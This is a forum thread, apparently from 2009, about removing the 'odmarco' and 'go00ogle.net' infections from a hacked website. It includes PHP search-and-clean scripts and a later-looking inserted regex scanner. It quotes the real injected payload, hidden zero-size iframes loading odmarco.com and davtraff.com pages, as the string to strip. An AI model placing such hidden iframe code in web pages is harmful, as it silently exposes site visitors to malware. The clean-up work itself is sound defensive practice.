Removing Odmarco and go00ogle.net infections
rockinaway
Join Date: Jun 2005
Posts: 211
rockinaway rockinaway is offline 08-29-2009, 10:00 PM

Recently, as many of you know, the forum was attacked and infected with malicious code and it took me approx. 5-6 hours to remove the infections properly. The forum was infected with 2 main things: 'odmarco' and 'go00ogle.net'. Both were causing major issues and blocked many users and made the forum VERY unsafe.

Odmarco was probably the most difficult to remove, as it added malicious code to nearly every HTML file that it could access. What was worse was that it varied the code in several files.

In this article, I aim to show you two tips on removing these infections.

Odmarco Infection

Being the most difficult, it hit me very hard that I had to search ALL HTML files manually; therefore, I looked for scripts to help me. Thankfully, I found a handy website here: Left On The Web / Cleaning "infected" file from the odmarco string

There is a great deal of explanation on that page and, more importantly, a script to help remove the strings. All the script does is search for the odmarco string and remove it from the files. I have attached the file here as well (clear_odmarco.php).

Once you know what the main string is, copy and edit the following part in the file:

Code:
protected $string_to_clear = '<iframe src="http://odmarco.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://wjzmv6.davtraff.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://l0dari.davtraff.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>';
Replace the iframe string with the code that is in your files.

This goes through all your files and folders to find any sign of the code. It all worked fine, until I realised that the code varies in some files. Therefore, you can change the script slightly to search for any remaining code. I have attached an edited version of the same file that can search for malicious strings (search_odmarco.php).

This file will search for the word 'odmarco' in any files, and then return 'FOUND' next to any files that contain it. You can then access these files to find the variations of the odmarco string. Then, you can either remove them manually, or change the $string_to_clear in clear_odmarco.php to help remove them for you.

Keep repeating this until the search reports no files containing the word. You can repeat this for ANY other type of malicious code by simply changing the search term on line 38:

Code:
 // strpos() returns 0 when the term sits at the very start of the file, and 0 is falsy,
 // so compare against false explicitly or such files are silently skipped
 if (strpos($contents, 'odmarco') !== false)
Just replace odmarco with any other term. This should help you remove any traces of the infection and saves A LOT of time.
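As an added example, and not the attached clear_odmarco.php or search_odmarco.php, here is one PHP script that combines the search and the clean-up from the steps above and matches the varying iframe forms with a regular expression instead of one fixed string. The web root path, the marker list and the `--clean` switch are assumptions; by default it only reports.

```php
<?php
// Added example: recursively scans a web root for injected hidden iframes whose
// src URL contains one of the given markers, lists every hit with the exact
// variant found, and in --clean mode writes a .bak copy before stripping the tag.
$args    = isset($argv) ? $argv : array();
$root    = isset($args[1]) ? $args[1] : '.';           // assumed: web root to scan
$clean   = in_array('--clean', $args, true);           // assumed switch; default is report-only
$markers = array('odmarco', 'davtraff');               // domains quoted on this page
$exts    = array('html', 'htm', 'php', 'js', 'tpl');   // assumed file types worth checking

// One pattern covers the variants: any <iframe ...> whose src host contains a
// marker, whatever the attribute order or the width/height/style values are.
$quoted  = array_map(function ($m) { return preg_quote($m, '~'); }, $markers);
$pattern = '~<iframe\b[^>]*\bsrc=["\']?https?://[^"\'\s>]*(?:' . implode('|', $quoted)
         . ')[^>]*>\s*</iframe>~i';

$iter  = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
$found = 0;
foreach ($iter as $file) {
    if (!$file->isFile() || !in_array(strtolower($file->getExtension()), $exts, true)) {
        continue;
    }
    $path     = $file->getPathname();
    $contents = file_get_contents($path);
    if ($contents === false) {
        continue;
    }
    // preg_match_all() returns the hit count, so no strpos()-style 0/false mix-up here
    $count = preg_match_all($pattern, $contents, $matches);
    if (!$count) {
        continue;
    }
    $found++;
    echo $path, ' FOUND (', $count, " injected iframe(s))\n";
    foreach ($matches[0] as $tag) {
        echo '    ', substr($tag, 0, 80), "\n";         // show each variant for review
    }
    if ($clean) {
        copy($path, $path . '.bak');                     // keep the original for later forensics
        file_put_contents($path, preg_replace($pattern, '', $contents));
    }
}
echo $found, " file(s) matched\n";
```

Run it from the shell as `php scan_iframes.php /path/to/webroot` first, check the listed variants, and only then add `--clean`; the repeat-until-zero loop described above applies unchanged.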

go00ogle.net Infection

This infection is much easier to remove. blog.ambor.com: How to remove a go00ogle.net infection from your WordPress blog contains a full list of steps to remove the malicious code and is considerably more straightforward.

For this infection, one (or several) of your javascript files gets infected with malicious code. You could choose to use the method for odmarco (with the files) to remove this or you can follow the steps given in the link. Since you shouldn't have that many JS files loading up, it shouldn't be too difficult for you to manually remove the code.

I hope this helps somewhat if you get infected. Any questions, just ask.

Originally posted @ AdminFuel

Attached Files
File Type: zip odmarco files.zip (1.4 KB, 11 views)
  #2  
Old 09-07-2009, 08:28 PM
lazydesis lazydesis is offline
Join Date: Sep 2006
Posts: 234

How do you know if you got infected or not?
  #3  
Old 09-08-2009, 05:27 PM
rockinaway rockinaway is offline
Join Date: Jun 2005
Posts: 211

When your page is loading, you will see the URLs loading, and there will be numerous URLs with 'odmarco' in them. Also, Google would end up blocking your website and you can use Webmaster Tools to find out what you are infected with.

go00ogle.net Infections are easier to find and are described in the link.
  #4  
Old 09-18-2009, 07:31 PM
avsunforum avsunforum is offline
Join Date: Feb 2008
Posts: 107

Thanks
  #5  
Old 11-12-2009, 01:02 AM
abdobasha2004 abdobasha2004 is offline
Join Date: Aug 2008
Posts: 541

Thanks a lot for sharing this.
I think I am not infected; however, it is worth making sure of it.
Thanks.